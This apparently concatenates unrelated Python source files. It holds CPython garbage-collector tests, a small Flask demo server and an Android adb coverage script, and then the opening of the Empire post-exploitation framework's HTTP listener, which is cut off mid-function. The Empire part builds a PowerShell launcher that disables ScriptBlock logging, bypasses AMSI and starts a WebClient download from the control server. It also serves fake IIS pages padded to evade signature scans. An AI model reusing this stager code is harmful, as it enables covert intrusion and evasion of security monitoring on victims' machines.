@requires_type_collecting
def test_gc_main_module_at_shutdown(self):
# Create a reference cycle through the __main__ module and check
# it gets collected at interpreter shutdown.
code = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_gc_ordinary_module_at_shutdown(self):
# Same as above, but with a non-__main__ module.
with temp_dir() as script_dir:
module = """if 1:
class C:
def __del__(self):
print('__del__ called')
l = [C()]
l.append(l)
"""
code = """if 1:
import sys
sys.path.insert(0, %r)
import gctest
""" % (script_dir,)
make_script(script_dir, 'gctest', module)
rc, out, err = assert_python_ok('-c', code)
self.assertEqual(out.strip(), b'__del__ called')
@requires_type_collecting
def test_global_del_SystemExit(self):
code = """if 1:
class ClassWithDel:
def __del__(self):
print('__del__ called')
a = ClassWithDel()
a.link = a
raise SystemExit(0)"""
self.addCleanup(unlink, TESTFN)
with open(TESTFN, 'w') as script:
script.write(code)
rc, out, err = assert_python_ok(TESTFN)
self.assertEqual(out.strip(), b'__del__ called')
def test_get_stats(self):
stats = gc.get_stats()
self.assertEqual(len(stats), 3)
for st in stats:
self.assertIsInstance(st, dict)
self.assertEqual(set(st),
{"collected", "collections", "uncollectable"})
self.assertGreaterEqual(st["collected"], 0)
self.assertGreaterEqual(st["collections"], 0)
self.assertGreaterEqual(st["uncollectable"], 0)
# Check that collection counts are incremented correctly
if gc.isenabled():
self.addCleanup(gc.enable)
gc.disable()
old = gc.get_stats()
gc.collect(0)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"])
gc.collect(2)
new = gc.get_stats()
self.assertEqual(new[0]["collections"], old[0]["collections"] + 1)
self.assertEqual(new[1]["collections"], old[1]["collections"])
self.assertEqual(new[2]["collections"], old[2]["collections"] + 1)
def test_freeze(self):
gc.freeze()
self.assertGreater(gc.get_freeze_count(), 0)
gc.unfreeze()
self.assertEqual(gc.get_freeze_count(), 0)
def test_get_objects(self):
gc.collect()
l = []
l.append(l)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=0)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=1)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
gc.collect(generation=2)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=0))
)
self.assertFalse(
any(l is element for element in gc.get_objects(generation=1))
)
self.assertTrue(
any(l is element for element in gc.get_objects(generation=2))
)
del l
gc.collect()
def test_get_objects_arguments(self):
gc.collect()
self.assertEqual(len(gc.get_objects()),
len(gc.get_objects(generation=None)))
self.assertRaises(ValueError, gc.get_objects, 1000)
self.assertRaises(ValueError, gc.get_objects, -1000)
self.assertRaises(TypeError, gc.get_objects, "1")
self.assertRaises(TypeError, gc.get_objects, 1.234)
def test_38379(self):
# When a finalizer resurrects objects, stats were reporting them as
# having been collected. This affected both collect()'s return
# value and the dicts returned by get_stats().
N = 100
class A: # simple self-loop
def __init__(self):
self.me = self
class Z(A): # resurrecting __del__
def __del__(self):
zs.append(self)
zs = []
def getstats():
d = gc.get_stats()[-1]
return d['collected'], d['uncollectable']
gc.collect()
gc.disable()
# No problems if just collecting A() instances.
oldc, oldnc = getstats()
for i in range(N):
A()
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N) # instance object & its dict
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
# But Z() is not actually collected.
oldc, oldnc = c, nc
Z()
# Nothing is collected - Z() is merely resurrected.
t = gc.collect()
c, nc = getstats()
#self.assertEqual(t, 2) # before
self.assertEqual(t, 0) # after
#self.assertEqual(c - oldc, 2) # before
self.assertEqual(c - oldc, 0) # after
self.assertEqual(nc - oldnc, 0)
# Unfortunately, a Z() prevents _anything_ from being collected.
# It should be possible to collect the A instances anyway, but
# that will require non-trivial code changes.
oldc, oldnc = c, nc
for i in range(N):
A()
Z()
# Z() prevents anything from being collected.
t = gc.collect()
c, nc = getstats()
#self.assertEqual(t, 2*N + 2) # before
self.assertEqual(t, 0) # after
#self.assertEqual(c - oldc, 2*N + 2) # before
self.assertEqual(c - oldc, 0) # after
self.assertEqual(nc - oldnc, 0)
# But the A() trash is reclaimed on the next run.
oldc, oldnc = c, nc
t = gc.collect()
c, nc = getstats()
self.assertEqual(t, 2*N)
self.assertEqual(c - oldc, 2*N)
self.assertEqual(nc - oldnc, 0)
gc.enable()
class GCCallbackTests(unittest.TestCase):
def setUp(self):
# Save gc state and disable it.
self.enabled = gc.isenabled()
gc.disable()
self.debug = gc.get_debug()
gc.set_debug(0)
gc.callbacks.append(self.cb1)
gc.callbacks.append(self.cb2)
self.othergarbage = []
def tearDown(self):
# Restore gc state
del self.visit
gc.callbacks.remove(self.cb1)
gc.callbacks.remove(self.cb2)
gc.set_debug(self.debug)
if self.enabled:
gc.enable()
# destroy any uncollectables
gc.collect()
for obj in gc.garbage:
if isinstance(obj, Uncollectable):
obj.partner = None
del gc.garbage[:]
del self.othergarbage
gc.collect()
def preclean(self):
# Remove all fluff from the system. Invoke this function
# manually rather than through self.setUp() for maximum
# safety.
self.visit = []
gc.collect()
garbage, gc.garbage[:] = gc.garbage[:], []
self.othergarbage.append(garbage)
self.visit = []
def cb1(self, phase, info):
self.visit.append((1, phase, dict(info)))
def cb2(self, phase, info):
self.visit.append((2, phase, dict(info)))
if phase == "stop" and hasattr(self, "cleanup"):
# Clean Uncollectable from garbage
uc = [e for e in gc.garbage if isinstance(e, Uncollectable)]
gc.garbage[:] = [e for e in gc.garbage
if not isinstance(e, Uncollectable)]
for e in uc:
e.partner = None
def test_collect(self):
self.preclean()
gc.collect()
# Algorithmically verify the contents of self.visit
# because it is long and tortuous.
# Count the number of visits to each callback
n = [v[0] for v in self.visit]
n1 = [i for i in n if i == 1]
n2 = [i for i in n if i == 2]
self.assertEqual(n1, [1]*2)
self.assertEqual(n2, [2]*2)
# Count that we got the right number of start and stop callbacks.
n = [v[1] for v in self.visit]
n1 = [i for i in n if i == "start"]
n2 = [i for i in n if i == "stop"]
self.assertEqual(n1, ["start"]*2)
self.assertEqual(n2, ["stop"]*2)
# Check that we got the right info dict for all callbacks
for v in self.visit:
info = v[2]
self.assertTrue("generation" in info)
self.assertTrue("collected" in info)
self.assertTrue("uncollectable" in info)
def test_collect_generation(self):
self.preclean()
gc.collect(2)
for v in self.visit:
info = v[2]
self.assertEqual(info["generation"], 2)
@cpython_only
def test_collect_garbage(self):
self.preclean()
# Each of these cause four objects to be garbage: Two
# Uncollectables and their instance dicts.
Uncollectable()
Uncollectable()
C1055820(666)
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 2)
self.assertEqual(info["uncollectable"], 8)
# We should now have the Uncollectables in gc.garbage
self.assertEqual(len(gc.garbage), 4)
for e in gc.garbage:
self.assertIsInstance(e, Uncollectable)
# Now, let our callback handle the Uncollectable instances
self.cleanup=True
self.visit = []
gc.garbage[:] = []
gc.collect()
for v in self.visit:
if v[1] != "stop":
continue
info = v[2]
self.assertEqual(info["collected"], 0)
self.assertEqual(info["uncollectable"], 4)
# Uncollectables should be gone
self.assertEqual(len(gc.garbage), 0)
@unittest.skipIf(BUILD_WITH_NDEBUG,
'built with -NDEBUG')
def test_refcount_errors(self):
self.preclean()
# Verify the "handling" of objects with broken refcounts
# Skip the test if ctypes is not available
import_module("ctypes")
import subprocess
code = textwrap.dedent('''
from test.support import gc_collect, SuppressCrashReport
a = [1, 2, 3]
b = [a]
# Avoid coredump when Py_FatalError() calls abort()
SuppressCrashReport().__enter__()
# Simulate the refcount of "a" being too low (compared to the
# references held on it by live data), but keeping it above zero
# (to avoid deallocating it):
import ctypes
ctypes.pythonapi.Py_DecRef(ctypes.py_object(a))
# The garbage collector should now have a fatal error
# when it reaches the broken object
gc_collect()
''')
p = subprocess.Popen([sys.executable, "-c", code],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
p.stdout.close()
p.stderr.close()
# Verify that stderr has a useful error message:
self.assertRegex(stderr,
br'gcmodule\.c:[0-9]+: gc_decref: Assertion "gc_get_refs\(g\) > 0" failed.')
self.assertRegex(stderr,
br'refcount is too small')
# "address : 0x7fb5062efc18"
# "address : 7FB5062EFC18"
address_regex = br'[0-9a-fA-Fx]+'
self.assertRegex(stderr,
br'object address : ' + address_regex)
self.assertRegex(stderr,
br'object refcount : 1')
self.assertRegex(stderr,
br'object type : ' + address_regex)
self.assertRegex(stderr,
br'object type name: list')
self.assertRegex(stderr,
br'object repr : \[1, 2, 3\]')
class GCTogglingTests(unittest.TestCase):
def setUp(self):
gc.enable()
def tearDown(self):
gc.disable()
def test_bug1055820c(self):
# Corresponds to temp2c.py in the bug report. This is pretty
# elaborate.
c0 = C1055820(0)
# Move c0 into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_c0_alive = c0
del c0.loop # now only c1 keeps c0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
ouch = []
def callback(ignored):
ouch[:] = [c2wr()]
# The callback gets associated with a wr on an object in generation 2.
c0wr = weakref.ref(c0, callback)
c0 = c1 = c2 = None
# What we've set up: c0, c1, and c2 are all trash now. c0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's a
# global weakref to c2 (c2wr), but that weakref has no callback.
# There's also a global weakref to c0 (c0wr), and that does have a
# callback, and that callback references c2 via c2wr().
#
# c0 has a wr with callback, which references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see c0 at all, and c0 is
# the only object that has a weakref with a callback. gc clears c1
# and c2. Clearing c1 has the side effect of dropping the refcount on
# c0 to 0, so c0 goes away (despite that it's in an older generation)
# and c0's wr callback triggers. That in turn materializes a reference
# to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
junk = []
i = 0
detector = GC_Detector()
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else the callback wasn't invoked
for x in ouch:
# If the callback resurrected c2, the instance would be damaged,
# with an empty __dict__.
self.assertEqual(x, None)
def test_bug1055820d(self):
# Corresponds to temp2d.py in the bug report. This is very much like
# test_bug1055820c, but uses a __del__ method instead of a weakref
# callback to sneak in a resurrection of cyclic trash.
ouch = []
class D(C1055820):
def __del__(self):
ouch[:] = [c2wr()]
d0 = D(0)
# Move all the above into generation 2.
gc.collect()
c1 = C1055820(1)
c1.keep_d0_alive = d0
del d0.loop # now only c1 keeps d0 alive
c2 = C1055820(2)
c2wr = weakref.ref(c2) # no callback!
d0 = c1 = c2 = None
# What we've set up: d0, c1, and c2 are all trash now. d0 is in
# generation 2. The only thing keeping it alive is that c1 points to
# it. c1 and c2 are in generation 0, and are in self-loops. There's
# a global weakref to c2 (c2wr), but that weakref has no callback.
# There are no other weakrefs.
#
# d0 has a __del__ method that references c2wr
# ^
# |
# | Generation 2 above dots
#. . . . . . . .|. . . . . . . . . . . . . . . . . . . . . . . .
# | Generation 0 below dots
# |
# |
# ^->c1 ^->c2 has a wr but no callback
# | | | |
# <--v <--v
#
# So this is the nightmare: when generation 0 gets collected, we see
# that c2 has a callback-free weakref, and c1 doesn't even have a
# weakref. Collecting generation 0 doesn't see d0 at all. gc clears
# c1 and c2. Clearing c1 has the side effect of dropping the refcount
# on d0 to 0, so d0 goes away (despite that it's in an older
# generation) and d0's __del__ triggers. That in turn materializes
# a reference to c2 via c2wr(), but c2 gets cleared anyway by gc.
# We want to let gc happen "naturally", to preserve the distinction
# between generations.
detector = GC_Detector()
junk = []
i = 0
while not detector.gc_happened:
i += 1
if i > 10000:
self.fail("gc didn't happen after 10000 iterations")
self.assertEqual(len(ouch), 0)
junk.append([]) # this will eventually trigger gc
self.assertEqual(len(ouch), 1) # else __del__ wasn't invoked
for x in ouch:
# If __del__ resurrected c2, the instance would be damaged, with an
# empty __dict__.
self.assertEqual(x, None)
def test_main():
enabled = gc.isenabled()
gc.disable()
assert not gc.isenabled()
debug = gc.get_debug()
gc.set_debug(debug & ~gc.DEBUG_LEAK) # this test is supposed to leak
try:
gc.collect() # Delete 2nd generation garbage
run_unittest(GCTests, GCTogglingTests, GCCallbackTests)
finally:
gc.set_debug(debug)
# test gc.enable() even if GC is disabled by default
if verbose:
print("restoring automatic collection")
# make sure to always test gc.enable()
gc.enable()
assert gc.isenabled()
if not enabled:
gc.disable()
if __name__ == "__main__":
test_main()
|
http_server.py
|
import os
import signal
from datetime import datetime
from functools import update_wrapper, wraps
from threading import Thread, Timer
import flask
from flask import request
from server.demo_control import DemoControl
from server.detector_wrappers import EnvelopeHandler, IQHandler, PowerBinHandler, SparseHandler
# TODO: The Flask framework does not support a global shared state like the demo_ctrl object
# below. It seems to work anyway when using the build in development server. For better
# reliability and scaling this file should be rewritten for another framework, e.g.
# Twisted, that is better suited for handling a common state that is shared between
# different http sessions.
demo_ctrl = DemoControl()
app = flask.Flask(__name__, static_url_path="/static")
def nocache(view):
@wraps(view)
def no_cache(*args, **kwargs):
response = flask.make_response(view(*args, **kwargs))
response.headers["Last-Modified"] = datetime.now()
response.headers["Cache-Control"] = (
"no-store, no-cache, must-revalidate, post-check=0," " pre-check=0, max-age=0"
)
response.headers["Pragma"] = "no-cache"
response.headers["Expires"] = "-1"
return response
return update_wrapper(no_cache, view)
@app.route("/")
@nocache
def root():
return app.send_static_file("index.html")
def shutdown_server():
print("Shutting down")
os.kill(os.getpid(), signal.SIGINT)
@app.route("/exit", methods=["GET"])
def shutdown():
t = Timer(1.0, shutdown_server)
t.start()
return '{"ok": null}'
@app.route("/<path:path>")
@nocache
def static_file(path):
return app.send_static_file(path)
def event_stream():
mess_queue = demo_ctrl.subscribe()
while True:
mess = mess_queue.get()
yield "data:" + mess + "\n\n"
@app.route("/stream")
def stream():
return flask.Response(
event_stream(), mimetype="text/event-stream", headers={"Access-Control-Allow-Origin": "*"}
)
@app.route("/start/<detector_name>")
def detector_start(detector_name):
print("got start %s" % detector_name)
print("params %s" % request.args)
res = demo_ctrl.start_detector(detector_name, request.args)
print(request.args)
return flask.jsonify(res)
@app.route("/stop")
def button_stop():
res = demo_ctrl.stop_detector()
return flask.jsonify(res)
@app.route("/rvc/<command>/<value>")
def rvc2(command, value):
if command in ["start", "stop", "turn"]:
print("Got command: %s" % command)
demo_ctrl.put_cmd(["rvc_command", command, value])
res = {"ok": None}
else:
print("Got unknown command: %s" % command)
res = {"error": "Unknown RVC command: %s" % command}
return flask.jsonify(res)
def worker_thread_main_loop():
while demo_ctrl.process_next():
pass
print("Worker thread stopped")
def stop_server():
demo_ctrl.put_cmd(["exit"])
def start_server(args):
old_handler = signal.getsignal(signal.SIGINT)
def signal_handler(sig, frame):
print("CTRL-C pressed!")
stop_server()
old_handler(sig, frame)
signal.signal(signal.SIGINT, signal_handler)
demo_ctrl.set_streaming_client_args(args)
demo_ctrl.add_detector(PowerBinHandler)
demo_ctrl.add_detector(EnvelopeHandler)
demo_ctrl.add_detector(IQHandler)
demo_ctrl.add_detector(SparseHandler)
main_loop_worker = Thread(target=worker_thread_main_loop)
main_loop_worker.start()
app.run(host="localhost", threaded=True)
print("http server stopped")
|
act_coverage.py
|
# Copyright (c) 2016-present, Ke Mao. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
#
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
#
# * The names of the contributors may not be used to endorse or
# promote products derived from this software without specific
# prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import os, sys, shutil, datetime, time
from lxml import html
from bs4 import UnicodeDammit
import settings
import subprocess, threading
from crashes import crash_handler
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def run(self, timeout):
def target():
print '... Evaluate Script Thread started'
self.process = subprocess.Popen(self.cmd, shell=True)
self.process.communicate()
print '... Evaluate Script Thread finished'
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print 'Terminating process'
self.process.terminate()
# os.system("kill -9 $(lsof -i:5037 | tail -n +2 | awk '{print $2}')")
# os.system("adb devices")
thread.join()
print self.process.returncode
def cal_coverage(path, gen, pop):
activities = set()
for file_name in os.listdir(path):
if file_name.startswith("activity.coverage." + str(gen) + "." + str(pop) + "."):
file_path = path + file_name
file_coverage = open(file_path)
for line in file_coverage:
activities.add(line.strip())
file_coverage.close()
return 10.0 * len(activities)
# return accumulative coverage and average length
def get_suite_coverage(scripts, device, apk_dir, package_name, gen, pop):
unique_crashes = set()
# clean states
os.system("adb -s " + device + " shell am force-stop " + package_name)
os.system("adb -s " + device + " shell pm clear " + package_name)
# os.system("rm " + apk_dir + "/intermediate/activity.coverage.*")
# run scripts
for index, script in enumerate(scripts):
start_target = "adb -s " + device + " shell motifcore -p " + package_name + " -c android.intent.category.LAUNCHER 1"
os.system(start_target)
os.system("adb -s " + device + " push " + script + " /mnt/sdcard/")
script_name = script.split("/")[-1]
# command = Command("adb -s " + device + " shell motifcore -p " + package_name + " --bugreport --throttle " + str(
# settings.THROTTLE) + " -f /mnt/sdcard/" + script_name + " 1")
# command = Command("adb -s " + device + " shell motifcore -p " + package_name + " --bugreport " + "-f /mnt/sdcard/" + script_name + " 1")
# command.run(timeout=600)
cmd = "adb -s " + device + " shell motifcore -p " + package_name + " --bugreport --string-seeding /mnt/sdcard/" + package_name + "_strings.xml" + " -f /mnt/sdcard/" + script_name + " 1"
os.system(settings.TIMEOUT_CMD + " " + str(settings.EVAL_TIMEOUT) + " " + cmd)
# need to manually kill motifcore when timeout
kill_motifcore_cmd = "shell ps | awk '/com\.android\.commands\.motifcore/ { system(\"adb -s " + device + " shell kill \" $2) }'"
os.system("adb -s " + device + " " + kill_motifcore_cmd)
os.system("adb -s " + device + " pull /sdcard/activity.coverage " + apk_dir + "/coverages/activity.coverage." + str(gen) + "." + str(pop) + "." + str(index))
crash_handler.handle(device, apk_dir, script, gen, pop, index, unique_crashes)
# close app
os.system("adb -s " + device + " shell pm clear " + package_name)
os.system("adb -s " + device + " shell am force-stop " + package_name)
coverage = cal_coverage(apk_dir + "/coverages/", gen, pop)
# print "\n\n\n### get_suite_coverage: Coverage, num crashes =", coverage, ",", len(unique_crashes)
return coverage, len(unique_crashes)
|
http.py
|
import logging
import base64
import sys
import random
import os
import ssl
import time
import copy
import sys
from pydispatch import dispatcher
from flask import Flask, request, make_response, send_from_directory
# Empire imports
from lib.common import helpers
from lib.common import agents
from lib.common import encryption
from lib.common import packets
from lib.common import messages
from lib.common import templating
from lib.common import obfuscation
class Listener:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'HTTP[S]',
'Author': ['@harmj0y'],
'Description': ('Starts a http[s] listener (PowerShell or Python) that uses a GET/POST approach.'),
'Category' : ('client_server'),
'Comments': []
}
# any options needed by the stager, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Name' : {
'Description' : 'Name for the listener.',
'Required' : True,
'Value' : 'http'
},
'Host' : {
'Description' : 'Hostname/IP for staging.',
'Required' : True,
'Value' : "http://%s:%s" % (helpers.lhost(), 80)
},
'BindIP' : {
'Description' : 'The IP to bind to on the control server.',
'Required' : True,
'Value' : '0.0.0.0'
},
'Port' : {
'Description' : 'Port for the listener.',
'Required' : True,
'Value' : 80
},
'Launcher' : {
'Description' : 'Launcher string.',
'Required' : True,
'Value' : 'powershell -noP -sta -w 1 -enc '
},
'StagingKey' : {
'Description' : 'Staging key for initial agent negotiation.',
'Required' : True,
'Value' : '2c103f2c4ed1e59c0b4e2e01821770fa'
},
'DefaultDelay' : {
'Description' : 'Agent delay/reach back interval (in seconds).',
'Required' : True,
'Value' : 5
},
'DefaultJitter' : {
'Description' : 'Jitter in agent reachback interval (0.0-1.0).',
'Required' : True,
'Value' : 0.0
},
'DefaultLostLimit' : {
'Description' : 'Number of missed checkins before exiting',
'Required' : True,
'Value' : 60
},
'DefaultProfile' : {
'Description' : 'Default communication profile for the agent.',
'Required' : True,
'Value' : "/admin/get.php,/news.php,/login/process.php|Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko"
},
'CertPath' : {
'Description' : 'Certificate path for https listeners.',
'Required' : False,
'Value' : ''
},
'KillDate' : {
'Description' : 'Date for the listener to exit (MM/dd/yyyy).',
'Required' : False,
'Value' : ''
},
'WorkingHours' : {
'Description' : 'Hours for the agent to operate (09:00-17:00).',
'Required' : False,
'Value' : ''
},
'ServerVersion' : {
'Description' : 'Server header for the control server.',
'Required' : True,
'Value' : 'Microsoft-IIS/7.5'
},
'StagerURI' : {
'Description' : 'URI for the stager. Must use /download/. Example: /download/stager.php',
'Required' : False,
'Value' : ''
},
'UserAgent' : {
'Description' : 'User-agent string to use for the staging request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'Proxy' : {
'Description' : 'Proxy to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'ProxyCreds' : {
'Description' : 'Proxy credentials ([domain\]username:password) to use for request (default, none, or other).',
'Required' : False,
'Value' : 'default'
},
'SlackToken' : {
'Description' : 'Your SlackBot API token to communicate with your Slack instance.',
'Required' : False,
'Value' : ''
},
'SlackChannel' : {
'Description' : 'The Slack channel or DM that notifications will be sent to.',
'Required' : False,
'Value' : '#general'
}
}
# required:
self.mainMenu = mainMenu
self.threads = {}
# optional/specific for this module
self.app = None
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
# set the default staging key to the controller db default
self.options['StagingKey']['Value'] = str(helpers.get_config('staging_key')[0])
# randomize the length of the default_response and index_page headers to evade signature based scans
self.header_offset = random.randint(0, 64)
def default_response(self):
"""
Returns an IIS 7.5 404 not found page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/>',
'<title>404 - File or directory not found.</title>',
'<style type="text/css">',
'<!--',
'body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, sans-serif;background:#EEEEEE;}',
'fieldset{padding:0 15px 10px 15px;}',
'h1{font-size:2.4em;margin:0;color:#FFF;}',
'h2{font-size:1.7em;margin:0;color:#CC0000;}',
'h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;}',
'#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family:"trebuchet MS", Verdana, sans-serif;color:#FFF;',
'background-color:#555555;}',
'#content{margin:0 0 0 2%;position:relative;}',
'.content-container{background:#FFF;width:96%;margin-top:8px;padding:10px;position:relative;}',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="header"><h1>Server Error</h1></div>',
'<div id="content">',
' <div class="content-container"><fieldset>',
' <h2>404 - File or directory not found.</h2>',
' <h3>The resource you are looking for might have been removed, had its name changed, or is temporarily unavailable.</h3>',
' </fieldset></div>',
'</div>',
'</body>',
'</html>',
' ' * self.header_offset, # randomize the length of the header to evade signature based detection
])
def index_page(self):
"""
Returns a default HTTP server page.
"""
return '\n'.join([
'<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">',
'<html xmlns="http://www.w3.org/1999/xhtml">',
'<head>',
'<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />',
'<title>IIS7</title>',
'<style type="text/css">',
'<!--',
'body {',
' color:#000000;',
' background-color:#B3B3B3;',
' margin:0;',
'}',
'',
'#container {',
' margin-left:auto;',
' margin-right:auto;',
' text-align:center;',
' }',
'',
'a img {',
' border:none;',
'}',
'',
'-->',
'</style>',
'</head>',
'<body>',
'<div id="container">',
'<a href="http://go.microsoft.com/fwlink/?linkid=66138&clcid=0x409"><img src="welcome.png" alt="IIS7" width="571" height="411" /></a>',
'</div>',
'</body>',
'</html>',
])
def validate_options(self):
"""
Validate all options for this listener.
"""
self.uris = [a.strip('/') for a in self.options['DefaultProfile']['Value'].split('|')[0].split(',')]
for key in self.options:
if self.options[key]['Required'] and (str(self.options[key]['Value']).strip() == ''):
print helpers.color("[!] Option \"%s\" is required." % (key))
return False
return True
def generate_launcher(self, encode=True, obfuscate=False, obfuscationCommand="", userAgent='default', proxy='default', proxyCreds='default', stagerRetries='0', language=None, safeChecks='', listenerName=None):
"""
Generate a basic launcher for the specified listener.
"""
if not language:
print helpers.color('[!] listeners/http generate_launcher(): no language specified!')
if listenerName and (listenerName in self.threads) and (listenerName in self.mainMenu.listeners.activeListeners):
# extract the set options for this instantiated listener
listenerOptions = self.mainMenu.listeners.activeListeners[listenerName]['options']
host = listenerOptions['Host']['Value']
launcher = listenerOptions['Launcher']['Value']
stagingKey = listenerOptions['StagingKey']['Value']
profile = listenerOptions['DefaultProfile']['Value']
uris = [a for a in profile.split('|')[0].split(',')]
stage0 = random.choice(uris)
customHeaders = profile.split('|')[2:]
if language.startswith('po'):
# PowerShell
stager = '$ErrorActionPreference = \"SilentlyContinue\";'
if safeChecks.lower() == 'true':
stager = helpers.randomize_capitalization("If($PSVersionTable.PSVersion.Major -ge 3){")
# ScriptBlock Logging bypass
stager += helpers.randomize_capitalization("$GPF=[ref].Assembly.GetType(")
stager += "'System.Management.Automation.Utils'"
stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
stager += "'cachedGroupPolicySettings','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(");If($GPF){$GPC=$GPF.GetValue($null);If($GPC")
stager += "['ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("){$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging']=0;"
stager += helpers.randomize_capitalization("$GPC")
stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging']=0}"
stager += helpers.randomize_capitalization("$val=[Collections.Generic.Dictionary[string,System.Object]]::new();$val.Add")
stager += "('EnableScriptB'+'lockLogging',0);"
stager += helpers.randomize_capitalization("$val.Add")
stager += "('EnableScriptBlockInvocationLogging',0);"
stager += helpers.randomize_capitalization("$GPC")
stager += "['HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\PowerShell\ScriptB'+'lockLogging']"
stager += helpers.randomize_capitalization("=$val}")
stager += helpers.randomize_capitalization("Else{[ScriptBlock].\"GetFie`ld\"(")
stager += "'signatures','N'+'onPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,(New-Object Collections.Generic.HashSet[string]))}")
# @mattifestation's AMSI bypass
stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
stager += "'System.Management.Automation.AmsiUtils'"
stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
stager += "'amsiInitFailed','NonPublic,Static'"
stager += helpers.randomize_capitalization(").SetValue($null,$true)};")
stager += "};"
stager += helpers.randomize_capitalization("[System.Net.ServicePointManager]::Expect100Continue=0;")
stager += helpers.randomize_capitalization("$wc=New-Object System.Net.WebClient;")
if userAgent.lower() == 'default':
profile = listenerOptions['DefaultProfile']['Value']
userAgent = profile.split('|')[1]
stager += "$u='"+userAgent+"';"
if 'https' in host:
# allow for self-signed certificates for https connections
stager += "[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};"
if userAgent.lower() != 'none' or proxy.lower() != 'none':
if userAgent.lower() != 'none':
stager += helpers.randomize_capitalization('$wc.Headers.Add(')
stager += "'User-Agent',$u);"
if proxy.lower() != 'none':
